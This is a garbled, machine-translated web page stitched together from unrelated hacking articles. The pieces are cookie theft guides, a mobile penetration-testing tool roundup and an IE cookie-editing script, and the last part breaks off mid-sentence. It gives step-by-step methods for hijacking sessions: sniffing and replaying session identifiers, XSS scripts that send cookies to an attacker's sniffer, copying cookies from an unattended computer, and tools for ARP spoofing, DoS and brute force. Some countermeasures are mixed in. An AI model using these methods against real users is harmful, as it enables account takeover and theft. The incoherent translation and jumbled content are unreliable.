How to intercept cookies files. Methods of stealing cookies files. Physical access to data

Have you ever thought about how to personalize visitors on some Web nodes? This can be expressed, for example, in memorizing the contents of the "trolley" (if this node is intended for sale of goods) or in the method of filling the fields of some form. In the HTTP protocol underlying the functioning of the World Wide Web, there are no means that allow you to track events from one visit to the node to another, so a special addition was developed for the possibility of storing such "states". This mechanism described in the RFC 2109 document provides insertion into the transmitted queries and responses of HTTP special cookies data that allows WEB nodes to track their visitors.

Cookie data can be memorized for communication session time ( pER SESSION.), remaining in RAM during one session and removing when closing the browser, or even after the specified period of time expires. In other cases, they are permanent ( persistent.), remaining on the user's hard disk as a text file. Usually they are stored in the Cookies catalog (% WINDIR% \\ Cookies - in Win9x and% UserProfile% \\ Cookies - in NT / 2000). It is not difficult to guess that after capturing the cookie files in the Internet, the hacker can produce itself for the user of this computer, or collect important information contained in these files. After reading the following sections, you will understand how easy it is to do.

Interception of cookies files

The most direct way is to intercept cookies when transmitting them over the network. The intercepted data can then be used when entering the appropriate server. Such a task can be solved using any package interception utility, but one of the best is the Nikula Lawrence program ( Laurentiu Nicula.) SpyNet / Peepnet. SpyNet includes two utilities that work in the complex. Program Capturenet. Performs the capture of the package itself and saves it on the disk, and the PEEPNet utility opens this file and converts it to a readable format. The following example is a fragment of the Restored PEEPNet Communication Session program during which the cookie file is used to authenticate and control access to the viewed pages (to save anonymity the names changed).

Get http://www.victim.net/images/logo.gif http / 1.0 accept: * / * referrer: http://www.victim.net/ host: www.victim.net cookie: jrunsessionid \u003d 96114024278141622; Cuid \u003d Torpm! zxtfrlrlpwtvfiseblahblah

The example shows a Cookie fragment placed in an HTTP request to the server. The most important field is cuid \u003d.which sets a unique identifier used when authenticating the user on a node www.victim.net. Suppose that after that the hacker visited the Victim.net node, received its own identifier and cookie (it is assumed that the node places cookie data not in virtual memory, but writes them on the hard disk). Then a hacker can open its own cookie file and replace the Cuid \u003d field identifier in it, taking it from the intercepted package. In this case, when entering the Victim.Net server, it will be perceived as a user whose cookies have been intercepted.

Program's ability Peepnet Play the entire session or its fragment makes it much easier to implement the attacks of this type. Use the button Go Get IT! You can re-extract the pages that were viewed by the user using its Cookie data intercepted by the CaptureNet program. In the PEEPNET utility dialog box, you can see information about someone accomplished orders. At the same time, cookie data was used for authentication, intercepted by the CaptureNet program. Pay attention to the frame located in the lower right corner of the dialog box with the communication session data, and on the string that follows the Cookie line. These cookies used in authentication.

This is a rather clever trick. In addition, utility Capturenet. It can provide a full traffic record in decrypted form, which is almost equivalent to the possibilities of professional class utilities, such as Network Associates, Inc. company Sniffer Pro However utility SpyNet. Even better - it can be free!

Countermeasures

The nodes in which cookies are used to authenticate and storing important identification data are used. One of the tools that help in ensuring protection is the KookaBurra Software Cookie Cookie program, which can be found on the Web site http://www.kburra.com/cpal.html. This software product can be configured so that warning messages are generated for the WEB-node attempts to use the cookie mechanism. At the same time, you can "look behind the scenes" and decide whether to allow these actions. Internet Explorer has a built-in cookie support mechanism. To activate it, start the Internet Panel Options on the Security tab, go to the Security tab, select the Internet Zone element, set the Custom Level mode and for constant and temporary cookies. Set the switch to Prompt. Setting the use of cookies in the Netscape browser is performed using the command. Edit\u003e Preferences\u003e Advanced And setting the WARN ME BEFORE ACCEPTING A COOKIE or DISABLE COOKIES (Fig. 16.3). Taking the cookie file, you need to check whether it was written to the disk, and lend whether the Web node collects information about users.

Visiting a node on which cookies serve to authenticate, you need to make sure that the initially reported name and password are encrypted at least using the SSL protocol. Then this information will appear in the PEEPNet program at least in the form of a simple text.

The authors would prefer to completely abandon cookies if many often visited Web nodes did not require this mode. For example, Microsoft's Hotmail service has a cookie for registration worldwide. Since this service in the authentication process involves several different servers, then adding them to the zone of reliable nodes is not so simple (this process is described in the section "Reasonable use of security zones: a general solution to the problem of ActiveX elements"). In this case, the designation * .hotmail.com will help. Cookies are far from the perfect solution to the problem of incompleteness of the HTML protocol, however, alternative approaches appear to be even worse (for example, adding an identifier URL address that can be stored on Proxy servers). Until the idea appears better, the only output remains control over cookies using the methods listed above.

Capture cookies via URL

Imagine something terrible: Internet Explorer users click on specially designed hyperlinks and become potential victims, risking that their cookies will be intercepted. Bennet Hazelton ( Bennett Haselton.) and Jamie McCarthy ( Jamie McCarthy.) From the teenager organization PeaceFire, steady of freedom of communication via the Internet, published a scenario that embodies this idea to life. This script extracts cookies from a client computer if its user clicks on the link contained on this page. As a result, the contents of the cookie file becomes available for Web site operators.

This feature can be used in non-departious purposes by implementing the IFRAME descriptors to the HTML code of the Web page, the email in HTML format or messages from the newsgroup. In the following example, the proposed security counselor Richard M. Smith demonstrates the possibility of using the IFRAME descriptors together with the utility developed by Peacefire.

</p><p>You can make a cunning e-mail that "captured" would cookie files from the user hard disk and transmitted them to the operators of the PeaceFire.org node. To do this, it is necessary to put a link to this node many times as shown in example. Despite the fact that the guys from Peacefire look pretty pleasant people, it is unlikely that someone will like it if confidential data fall into their hands.</p> <h3>Countermeasures</h3> <p>Install the update module that you can find at http://www.microsoft.com/technet/security/bulletin/ms00-033.asp. You can also use the program. <b>Cookie Pal</b> or built-in Internet Explorer features, as described above.</p> <p>"Smartphone with hacker utilities? No such, "we would have recently told you. To run cairca, the usual tools for implementing attacks could only be on any Maemo. Now, many familiar tools ported under iOS and Android, and some Hack Tulza were specially written for mobile surroundings. Can a smartphone replace a laptop in penetration tests? We decided to check.</p><h2>Android</h2> Android is a popular platform not only for ordinary mortals, but also for the right people. The number of useful] [- the utilities here simply rolls. For this, you can say thanks to Unix-roots of the system - it has greatly simplified porting many tools on Android. Alas, some of them Google does not allow the Play Store, so you have to put the appropriate APK manually. Also, for some utilities, you need maximum access to the system (for example, IPTables firewall), so you should take care of root-access in advance. For each manufacturer, its own technology is used here, but simply finds the necessary instructions. A good set of HOWTO has collected Lifehacker resource (bit.ly/ewgdlu). However, if some model failed here, it always comes to the help of XDA-developers (www.xda-developers.com), where you can find various information in fact according to any Android-phone model. One way or another, part of the described utilities will earn and without root access. <h2>Package Manager</h2> Botbrew Let's start a review from an unusual package manager. Developers call it "utilities for superupers", and it is not far from the truth. After installing BotBrew, you get a repository where you can download a huge amount of android compiled tools. Among them: Python and Ruby Interpreters to launch numerous tools that are written on them, TCPDUMP sniffer and NMAP scanner for network analysis, Git and Subversion to work with version control systems and much more. <h2>Network scanners</h2> PIPS. <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_PIPS.jpg' align="center" height="512" width="288" loading=lazy loading=lazy> An invisible smartphone, which, unlike a laptop, is easily placed in his pocket and never causes suspicion, can be useful for networking. Above, we have already said how to install NMAP, but there is another option. PIPS is a specially adapted android, although the unofficial port of the NMAP scanner. So, you will be able to quickly find active devices on the network, determine their OS using options for fingerprinting, to scan ports - in short, do everything that NMAP is capable of. Fing. <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_Fing.jpg' align="center" height="512" width="307" loading=lazy loading=lazy> Using Nmap, despite all his power, there are two problems. First, the parameters for scanning are transmitted through the keys to start, which you need to not only know, but also be able to enter with an uncomfortable mobile keyboard. And secondly, the scan results in the console conclusion are not such visual, as I would like. These shortcomings are deprived of the Fing scanner, which very quickly scans the network, makes fingerprinting, after which it displays a list of all available devices, separating them by type (router, desktop, iPhone, and so on). At the same time, for each host you can quickly see the list of open ports. And right from here you can connect, say, to FTP, using the FTP client installed in the system, is very convenient. Netaudit. <img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_Net_Tools.jpg' align="center" height="512" width="288" loading=lazy loading=lazy> When it comes to analyzing a specific host, the Netaudit utility may be irreplaceable. It works on any Android device (even unworthy) and allows not only to quickly identify devices on the network, but also to explore them using a large fingerprinting database to determine the operating system, as well as CMS systems used on a web server. Now in the base of more than 3000 digital fingerprints. Net Tools. <img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_Net_Tools.jpg' align="center" height="512" width="288" loading=lazy loading=lazy> If you need, on the contrary, work at the level below and thoroughly examine the operation of the network, it is not necessary to do without NET Tools. This is an indispensable utility set in the operation of the system administrator, which allows you to completely digitize the operation of the network to which the device is connected. The package contains more than 15 different kinds of programs, such as Ping, Traceroute, ARP, DNS, Netstat, Route. <h2>Manipulation with traffic</h2> Shark for root. <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_Shark.png' height="336" width="224" loading=lazy loading=lazy> Based on TCPDUMP Sniffer honestly logs in a PCAP file all the data that can be further explored using the usual utility like Wireshark or Network Miner. Since no possibilities for MITM attacks are not implemented, it is rather a tool for analyzing your traffic. For example, it is a great way to explore what programs set on your device from dubious repositories. Faceniff. <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_FaceNIFF.jpg' align="center" height="452" width="256" loading=lazy loading=lazy> If we talk about Android combat applications, then one of the most sensational is Faceniff, implementing the interception and introduction into the intercepted web sessions. By downloading the APK-package with the program, you can almost on any Android-smartphone to start this hack tool and connecting to the wireless network, intercept accounts of various services: Facebook, Twitter, Vkontakte and so on - only more than ten. The hijacking session is carried out by the use of ARP Spoofing attack, but the attack is possible only on unprotected connections (Faceniff cannot be embedded in SSL traffic). To restrain the flow of scripts, the author limited the maximum number of three sessions - then you need to refer to the developer for a special activation code. DroidSheep <img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_DroidSheep.jpg' align="center" height="800" width="480" loading=lazy loading=lazy> If the Creator Faceniff wants to use a money, then DroidSheep is a completely free tool with the same functional. True, on the official website you will not find a distribution (this is due to the harsh laws of Germany in terms of the Security-utility), but it can be found in the network without any problems. The main task of the utility is to intercept custom web sessions of popular social networks implemented using all the same ARP Spoofing. But with the safe connection troubles: like Faceniff, DroidSheep flatly refuses to work with the HTTPS protocol. Network Spoofer. <img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_Network_Spoofer.png' align="center" height="800" width="480" loading=lazy loading=lazy> This utility also demonstrates unsuccessful open wireless networks, but somewhat in another plane. It does not intercept custom sessions, but allows you to skip the HTTP traffic through yourself using a spoofing attack, performing the set manipulations with it. Starting from ordinary pranks (replace all the pictures on the site by troll flashes, flip all the images or, say, changing the issuance of Google) and ending with phishing attacks when the user fit the fake pages of such popular services like Facebook.com, LinkedIn.com, vkontakte.ru and Many others. Anti (Android Network Toolkit by Zimperium Ltd) <br><img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_ANTI.jpg' align="center" width="100%" loading=lazy loading=lazy> If you ask what a hack utility for Android is the most powerful, then Anti, perhaps, no competitors. This is a real hacker combine. The main task of the program is to scan a network perimeter. Next, various modules come into battle, with the help of which a whole arsenal is implemented: it is also a traffic listener, and the execution of MITM attacks, and the operation of the found vulnerabilities. True, there are also its cons. The first thing that rushes into the eye is to use vulnerabilities only from the central program server, which is on the Internet, as a result of which the purposes that do not have an external IP address can be forgotten. <h2>Traffic tunneling</h2> Total Commander. <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/Android_TotalCommander.jpg' align="center" height="512" width="307" loading=lazy loading=lazy> Well-known File Manager now and on smartphones! As in the desktop version, there is a system of plug-ins here to connect to various network directories, as well as canonical two-layered mode - especially convenient on tablets. SSH Tunnel. <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_SSH_Tunnel.jpg' align="center" height="512" width="288" loading=lazy loading=lazy> Well, but how to ensure the security of your data, which are transmitted in an open wireless network? In addition to the VPN, which Android supports from the box, you can raise an SSH tunnel. To do this, there is a wonderful SSH Tunnel utility that allows you to wrap through the remote SSH server of the selected applications or the entire system as a whole. ProxyDroids often have to start traffic through proxy or juice, and in this case the proxyDroid will help. Everything is simple: you choose, what applications are you need to tunneling, and you specify a proxy (supported HTTP / HTTPS / SOCKS4 / SOCKS5). If you need authorization, ProxyDroid is also supported. By the way, the configuration can be bored on a specific wireless network by making different settings for each of them. <h2>Wireless networks</h2> WiFi Analyzer The built-in wireless network manager does not differ in informative. If you need to quickly get a full picture of the number of access points, then the WiFi Analyzer utility is a great choice. It will not only show all the access points nearby, but also displays the channel on which they work, their MAC address and, which is most importantly used by the type of encryption (seeing the cherished letters "WEP", we can assume that access to the protected network is provided ). In addition, the utility is ideal if you need to find where the desired access point is physically located, thanks to the visual indicator of the signal level. Wifikill This utility, as its developer declares, can be useful when a wireless network is clogged with customers who use the entire channel, namely at this moment you need a good connection and a stable connection. Wifikill allows you to disable customers from the Internet as selectively and on a specific criterion (for example, it is possible to press over all the apples). The program of all-going to the ARP Spoofing attack and redirects all customers to themselves. This algorithm to stupidity is simply implemented on the basis of IPTables. Such a control panel for fast-powded wireless networks :). <h2>Web Application Audit</h2> Http Query Builder. <img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_HTTP_Query_Builder.jpg' align="center" height="512" width="307" loading=lazy loading=lazy> Manipulate HTTP requests from a computer - Pleum business, there is a huge amount of utilities and plug-ins for browsers. In the case of a smartphone, everything is more complicated. Send a custom http request with the parameters you need, such as the desired cookie or modified user-agent, will help HTTP Query Builder. The result of the query will be displayed in a standard browser. Router Brute Force Ads 2 <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_RouterBruteForceADS.jpg' align="center" height="512" width="307" loading=lazy loading=lazy> If the site is being protected by a password using Basic Access Authentication, you can check its reliability using the Router Brute Force ADS 2 utility. Initially, the utility was created for broofer passwords on the adjuster router, but it is clear that it can be used and against any other resource with similar protection . The utility works, but clearly damp. For example, the developer does not provide a rough bust, and only Brutfors in the dictionary is possible. Andosid. <img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_AnDOSid.jpg' align="center" height="480" width="320" loading=lazy loading=lazy> Surely you heard about such a sensational program of outcasting the web servers, like Slowloris. The principle of its action: Create and hold the maximum number of connections with a remote web server, thus not allowing to connect to new customers. So, andosid is an analogue of Slowloris right in Android-deva! I will say in secret, two hundred connections are enough to ensure unstable work to each fourth website running apache web server. And all this - from your phone! <h2>Different usefulness</h2> Encode. <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_Encode.png' align="center" height="512" width="307" loading=lazy loading=lazy> When working with many web applications and analyzes their logic, it is often common for the data transmitted in the encoded form, namely BASE64. Encode will help you decode this data and see what it is stored in them. Perhaps substituting the quotes, coding them back to Base64 and substituting the studied site in the URL, you will get a cherished error of performing a database. Hexeditor If you need a hex editor, then it also has for Android. Using Hexeditor, you will be able to edit any files, including system, if you enhance the program of right to superuser. Excellent replacement for the standard text editor, allowing you to easily find the desired text fragment and change it. <h2>Remote access</h2> ConnectBot Having access to a remote host, you need to be able to use it. And for this you need customers. Let's start with SSH, where the standard de facto is already ConnectBot. In addition to the user-friendly interface, it provides the ability to organize protected tunnels via SSH connections. PocketCloud Remote RDP / VNC <img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/Android_PocketCloud-Remote.jpeg' align="center" height="512" width="307" loading=lazy loading=lazy> Useful program to connect to a remote desktop through RDP or VNC services. It is very pleased that these are two clients in one, there is no need to use different Tuls for RDP and VNC. SNMP MIB BROWSER. <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_SNMP_MIB_Browser.jpg' align="center" height="480" width="320" loading=lazy loading=lazy> Specially written for Android browser MIB, with which you can manage network devices via the SNMP protocol. It can be useful for the development of the attack vector to various routers, because the standard Community String (Simply put, no one has canceled password to control via SNMP. <h2>iOS.</h2> No less popular among the developers of the Security-utilities platform iOS. But if in the case of Android root rights, they needed only for some applications, then on devices from Apple jailbreak almost always. Fortunately, even for the latest firmware of Ideevis (5.1.1) there is already a Toolz for jailbreak. Together with full access, you still get an alternative Cydia application manager, which has already contained many utilities. <h2>Work with the system</h2> Mobileterminal <img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_MobileTerminal-187x280.jpg' height="280" width="187" loading=lazy loading=lazy> The first thing I want to start, is the installation of the terminal. For obvious reasons, there is no standard for the mobile OS, but it will be needed to run the console utilities that we will continue to talk about. The best implementation of the terminal emulator is MobileTerminal - it supports several terminals immediately, control gestures (for example, to transmit Control-C) and is generally impressive with its thoughtfulness. Issh. <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/iOS_iSSH.png' align="center" height="920" width="640" loading=lazy loading=lazy> Another, more complex option to access the device console is to install OpenSSH on it (this is done via Cydia) and locally connect to it via an SSH client. If you use the right client like ISSH, in which control from the touch screen is amazingly implemented, then this method is even more convenient than through MobileTerminal. <h2>Data interception</h2> PIRNI & PIRNI PRO <img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2014/12/iOS_Pirni-187x280.png' height="280" width="187" loading=lazy loading=lazy> Now that access to the console is, you can try utilities. Let's start with Pirni, which entered the story as a full sniffer for iOS. Unfortunately, a constructive limited Wi-Fi module embedded in the device cannot be translated into Promiscios-mode necessary for normal data interception. So, a classic ARP spoofing is used to intercept the data, with which all traffic is passed through the device itself. The standard version of the utility runs from the console, where in addition to the parameters of the MITM attack, the name of the PCAP file is specified in which all traffic is logged. The utility has a more advanced version - Pirni Pro, which boasts a graphical interface. Moreover, it knows how to pass HTTP traffic on the fly and even automatically pull out interesting data from there (for example, login-passwords), using regular expressions for this that are specified in the settings. Intercepter-NG (Console Edition) <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_Intercepter-NG-249x280.jpg' height="280" width="249" loading=lazy loading=lazy> The notorious Sniffer Intercepter-NG, which we have repeatedly wrote, recently has a console version. As the author says, most of the code is written on pure ANSI C, which behaves equally practically in any environment, so the console version from the very beginning has earned both desktop Windows, Linux and BSD and on mobile platforms, including iOS and Android . The console version has already implemented grabbing passwords transmitted according to the most different protocols, interception of messages of messengers (ICQ / Jabber and many others), as well as the resurrection of files from traffic (HTTP / FTP / IMAP / POP3 / SMTP / SMB). The network scan functions and high-quality ARP POISON are available. For correct operation, you must first install via CYDIA LIBPCAP package (do not forget to include developer packages in the settings). The entire startup instruction comes down to installing the right rights: CHMOD + X Intercepter_ios. Next, if you run a sniffer without parameters, a clear interactive interface of the iTercePter will appear, which allows you to start any attacks. Ettercap-NG. <img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_Ettercap-NG1-187x280.png' height="280" width="187" loading=lazy loading=lazy> It is difficult to believe, but this complex tool for implementing MITM attacks was still ported under iOS. After enormous work, it turned out a full-fledged mobile port. To save yourself from dancing with a tambourine around dependencies during self-compilation, it is better to install the already assembled packet using Cydia, after adding the data source with theworm.altervista.org/cydia (twrepo repository). The kit is also the Etterlog utility, which helps to extract useful information from the collected dump of various kinds of traffic (for example, access accounts to FTP). <h2>Analysis of wireless networks</h2> WiFi Analyzer <img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_WiFI-Analyzer-187x280.jpg' height="280" width="187" loading=lazy loading=lazy> In the old versions of IOS, the craftsmen launched the Aircrack and could break the WEP key, but we checked: the program does not work on new devices. Therefore, to study Wi-Fi, we will have to be content with only Wi-Fi-scanners. WiFi Analyzer analyzes and displays information about all available 802.11 networks around, including information about SSID, channels, vendors, MAC addresses and encryption types. The utility builds visual graphs in real time according to the data present. With such a program, it is easy to find a physical location of a point if you suddenly forgot it, and, for example, to watch WPS PIN, which can be useful for connecting. <h2>Network scanners</h2> SCANY Which program uses any feeder at any point of the planet regardless of the purposes and tasks? Network scanner. And in the case of iOS, it is likely to be the most powerful SCANY tulk. Thanks to the set of embedded utilities, you can quickly get a detailed picture of network devices and, for example, open ports. In addition, the package includes network test utilities, such as Ping, Traceroute, NSlookup. Fing However, many prefer Fing. The scanner has a fairly simple and limited functionality, but it is quite enough for the first acquaintance with the network, say, cafeteria :). The results displays information about available services on remote machines, MAC addresses and host names connected to the scanned network. Nikto would seem to have forgotten about Nikto, but why? After all, this web scanner of vulnerability written in the script language (namely on Perl), you can easily install through Cydia. And this means that you can easily run it on your jailbreak device from the terminal. Nikto will gladly provide you with additional information on the web resource test. In addition, you can add your own signatures to your knowledge database with your own hands. SQLMAP This powerful tool for automatic operation of SQL vulnerabilities is written in Python, and therefore setting the interpreter, they can be used without any problems directly from the mobile device. <h2>Remote control</h2> SNMP Scan. <img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_SNMP-Scan.jpg' align="center" height="480" width="334" loading=lazy loading=lazy> Many network devices (including expensive routers) are managed by the SNMP protocol. This utility allows you to scan the subnet for the available SNMP services with a predetermined value of Community String (Simply put, standard passwords). Note that the search for SNMP services with standard Community String (Public / Private) in an attempt to access the device management is an integral part of any penetration test along with the perimeter identification and detection of services. ITAP Mobile RDP / ITAP Mobile VNC <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_iTap_Mobile_RDP.jpg' align="center" height="480" width="320" loading=lazy loading=lazy> Two utilities from one manufacturer are designed to connect to a remote desktop using RDP and VNC protocols. There are many similar utilities in the App Store, but these are particularly convenient to use. <h2>Password recovery</h2> Hydra. <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_Hydra-187x280.jpg' height="280" width="187" loading=lazy loading=lazy> The legendary program that helps "remember" password to millions of hackers around the world was ported under iOS. Now directly from the iPhone is possible passwords for services such as HTTP, FTP, Telnet, SSH, SMB, VNC, SMTP, POP3 and many others. True, for a more effective attack, it is better to stock up good dictionaries for Brutfors. Pass Mule. <img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_PassMule.jpg' align="center" height="480" width="320" loading=lazy loading=lazy> Everyone does not first know such a vulnerability as the use of standard passwords. Pass Mule is a kind of reference book, in which all sorts of standard logins and passwords for network devices are collected. They are conveniently decomposed by the names of vendors, products and models, so finding the necessary will not be difficult. The program is rather designed to save time on the search for the manual to the router, the standard login and password for which you need to know. <h2>Operation of vulnerabilities</h2> Metasploit. <br><img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_Metasploit.png' align="center" width="100%" loading=lazy loading=lazy> It is difficult to imagine a more hacker utility than Metasploit - and it is she completes our today's review. Metasploit is a package of a variety of tools, the main task of which is to use vulnerabilities in software. Imagine: about 1000 reliable, proven and necessary in the daily life of the exploit pentester - right on the smartphone! With the help of such a tool, you can actually settle on any network. MetaSploit allows not only to operate bars in server applications - A tools for attacks on client applications are also available (for example, through the Browser AutoPWN module, when a battle load is inserted into customer traffic). It must be said here that the mobile version of the adobe does not exist, but the standard package can be installed on the Apple device using. <p><u><b>Cookies (Cookies)</b> </u>- Information as a text file, saved on the user's computer website. Contains authentication data (login / password, ID, phone number, mailbox address), user settings, access status. Stored in the browser profile.</p> <p><u><b>Hacking cookies</b> </u> - This is theft (or "hijacking") session of the visitor web resource. The closed information becomes available not only to the sender and the recipient, but also a third party - a person to the interception.</p> <h2>Tools and methods of hacking cookies</h2> <p>Computer thieves, like their colleagues in real life, in addition to skills, skills, and knowledge, of course, have their own tools - a kind of arsenal of bastards and probe. We will get acquainted with the most popular hectares of hackers, which they use to learn cookies from the Internet masters.</p> <h3>Sniffiers</h3> <p>Special programs for tracking and analyzing network traffic. Their name comes from the English verb "Sniff" (sniff), because In the literal sense, the words "sniff" transmitted packets between nodes.</p> <p>But the intruders with the help of a sniffer are intercepting session data, messages and other confidential information. The objects of their attacks become mainly unprotected networks, where cookies are sent in an open HTTP session, that is, practically not encrypted. (Public Wi-Fi is most vulnerable in this regard.)</p> <p>To embed a sniffer to the Internet channel between the user node and the web server, the following methods are used:</p> <ul><li>"Listening to" network interfaces (hubs, switches);</li> <li>branch and copy traffic;</li> <li>connection to the rupture of the network channel;</li> <li>analysis by means of special attacks, redirecting the traffic of sacrifice for a sniffer (Mac Spoofing, IP Spoofing).</li> </ul><p>XSS abbreviation means Cross Site Scripting - cross-site scripting. It is applied to the attack on websites for the purpose of kidnapping user data.</p> <p>The principle of XSS is as follows:</p> <ul><li>an attacker introduces malicious code (special disguised script) on the website of the site, the forum or to the message (for example, when correspondent in the social network);</li> <li>the victim enters the infected page and activates the established code on its PC (clicks, transfers by reference, etc.);</li> <li>in turn, the fastening code "retrieves" confidential user data from the browser (in particular, cookies) and sends them to the attacker's web server.</li> </ul><p>In order to "enlist" the program XSS mechanism, hackers use all sorts of vulnerabilities in web servers, online services and browsers.</p> <p><img src='https://i1.wp.com/sfztn.com/sites/default/files/blog/2015/03_March/3/xss.jpg' width="100%" loading=lazy loading=lazy></p> <p>All XSS vulnerabilities are divided into two types:</p> <ul><li><u><b>Passive</b>. </u> The attack is obtained by a request to a specific web page script. Malicious code can be entered into various forms on a web page (for example, in the site search string). Most susceptible to passive XSS resources on which there is no dataset filtering HTML tags;</li> <li><u><b>Active</b>. </u> Located directly on the server. And driven in the victim's browser. Actively used by fraudsters in all sorts of blogs, chat rooms and news feeds.</li> </ul><p>Hackers carefully "camouflage" their XSS scripts so that the victim does not suspect anything. Change the extension of the files, give the picture code, motivated to go through the link, attract an interesting content. As a result: the PC user who did not comply with his own curiosity, his own hand (click of the mouse) sends cookies of the session (with a login and password!) The author of the XSS script is a computer villain.</p> <h3>Cook substitution</h3> <p>All cookies are saved and sent to the web server (from which they "came") without any changes - in pristine form - with the same values, rows and other data. A deliberate modification of their parameters is called Cook Rezy. In other words, when changing cookies, an attacker issues the desired for valid. For example, when making a payment in the online store, the amount of payment changes in the cookie in a smaller side - thus the "savings" on purchases occurs.</p> <p>Stolen cookies of the session in the social network with someone else's account "are published" to another session and on another PC. The owner of the stolen cook receives full access to the victim's account (correspondence, content, page settings) until it is on its page.</p> <p><img src='https://i2.wp.com/sfztn.com/sites/default/files/blog/2015/03_March/3/cookie_manager.jpg' width="100%" loading=lazy loading=lazy></p> <p>Cook editing is carried out using:</p> <ul><li>functions "Cookies ..." in Opera browser;</li> <li>addon Cookies Manager and Advanced Cookie Manager for Firefox;</li> <li>iECookiesView utilities (Internet Explorer only);</li> <li>aKELPAD text editor, NotePad or Windows Notepad.</li> </ul><h3>Physical access to data</h3> <p>A very simple implementation scheme consists of several steps. But effective only if the computer of the victim with an open session, such as VKontakte, was left unattended (and enough for long!):</p> <ol><li>The JavaScript feature that displays all saved cookies is entered into the browser's address bar.</li> <li>After pressing "Enter", they all appear on the page.</li> <li>Cookies are copied, stored in a file, and then transferred to the USB flash drive.</li> <li>On another PC, the Cookie substitution is carried out in a new session.</li> <li>Access to the account of the victim.</li> </ol><p>As a rule, hackers use the above tools (+ others) both in the complex (since the level of protection on many web resources is high enough) and individually (when users exert excessive naiveness).</p> <h3>Xss + sniffer</h3> <ol><li>A XSS script is created, which indicates the address of the Sniffera-online (own manufacture or a specific service).</li> <li>Malicious code is saved with extension.img (image format).</li> <li>Then this file is loaded to the site page, in chat, or in a private message - where an attack will be carried out.</li> <li>The user's attention is drawn to the created "trap" (social engineering is already entering into force).</li> <li>If the "trap" works, cookies from the browser victims are intercepted by a sniffer.</li> <li>The hacker opens the Sniffer logs and removes abducted cookies.</li> <li>Next performs the substitution to obtain the rights of the account owner through the above tools.</li> </ol><h2>Cookies protection from hacking</h2> <ol><li>Use the encrypted connection (using appropriate protocols, and methods of ensuring).</li> <li>Do not respond to dubious links, pictures, tempting offers to get acquainted with "new free software." In particular, unfamiliar people.</li> <li>Use only trusted web resources.</li> <li>Finish an authorized session by pressing the "Exit" button (and not just close the tab!). Especially if the entry into account was not executed from a personal computer, but, for example, with a PC in an Internet cafe.</li> <li>Do not use the "Save Password" browser feature. Saved registration data increase the risk of theft at times. Do not be lazy, do not regret a few minutes of time to enter the password and login at the beginning of each session.</li> <li>After web surfing - visits to social networks, forums, chat rooms, sites - remove saved cookies and clean the browser cache.</li> <li>Regularly update browsers and antivirus software.</li> <li>Use browser extensions protecting from XSS attacks (for example, Noscript for FF and Google Chrome).</li> <li>Periodically in accounts.</li> </ol><p>And most importantly - do not lose vigilance and attention during rest or work on the Internet!</p> <p><b>What is the same cookie?</b><br></p><p>There is a mechanism that allows the HTTP server to save some text information on the user's computer, and then contact it. This information is called Cookie. In essence, each cookie is a pair: the name of the parameter and its value. Also, each cookie is assigned a domain to which it belongs. For security reasons in all browsers, the HTTP server is allowed only to contact your domain cookie. Additionally, cookie may have a date of the expiration, then they will be stored on the computer to this date, even if you close all the browser windows.</p><br><b>Why is cookie important?</b><br><p>All Cookies are used to identify the user in all multiplayer cookies. Rather, the current user connection with the service, user session. If someone finds out your cookie, it will be able to log in on your behalf. Because at the moment there are very few Internet resources checks the change of the IP address for one user session.</p><br><b>How to change or replace cookie?</b><br><p>Browser developers do not provide built-in cookies editing. But you can do and the usual notebook (NotePad).</p><br> Step 1: Create a text file with text <p>Windows Registry Editor Version 5.00</span><br><br><span> </span><br><br>@ \u003d "C: \\\\ IE_EXT.HTM"</p><p>Save it under the name IE_EXT.REG</p><p>Step 2: Using the created file, add changes to the Windows registry.</p><p>Step 3: Create a text file with text</p><p>< script <span>language \u003d "javascript"\u003e</span><br><span>external.menuarguments.clipboarddata.setdata ("text", external.Menuarguments.document.cookie);</span><br><br><span>external.Menuarguments.Document.Cookie \u003d. <span>"TestName \u003d TestValue; Path \u003d /; Domain \u003d testdomain.ru"</span>; </span><br><span>alert (external.Menuarguments.Document.Cookie);</span><br></p><p></ script > </p><br> Save it under the name C: \\ IE_EXT.HTM <p>Step 4: Go to the website of interest to us.</p><p>Step 5: Right-click on the clicks on a free page and select the menu item <i>"Working with cookies"</i>. Let me access the exchange buffer. The clipboard will get your cookie this site. You can insert them notebook (notepad) and see.</p><br><p>Step 6: To change some cookie, edit the file C: \\ IE_Ext.htm, replacing <i>testName.</i> in the name of Cookie, <i>testValue.</i> - on its meaning, <i>testdomain.ru.</i> - on the domain of the site. If necessary, add more similar lines. For convenience of control, I added to the script output of the current cookie before and after the change: <i>alert 